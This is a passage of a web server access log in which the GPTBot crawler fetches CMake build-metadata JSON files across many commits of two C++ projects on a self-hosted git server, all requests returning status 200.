"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13916] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13915] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13509] [Gzip 8.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:13:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13533] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:13:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 12860] [Gzip 4.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:13:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:13:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 12620] [Gzip 6.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:18:13:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13734] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:13:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12779] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:13:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 9999] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:18:13:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13730] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:13:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 9971] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:18:13:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13609] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:13:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 9992] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:18:13:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 1045] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:18:13:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13608] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:13:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:13:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13914] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:13:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9986] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13912] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12462] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:13:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9997] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:13:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13533] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:13:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9995] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:13:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13532] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:13:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:13:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12780] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:13:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13734] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:13:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:13:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 9997] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:18:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13534] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 12618] [Gzip 6.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:18:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13609] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12777] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13608] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 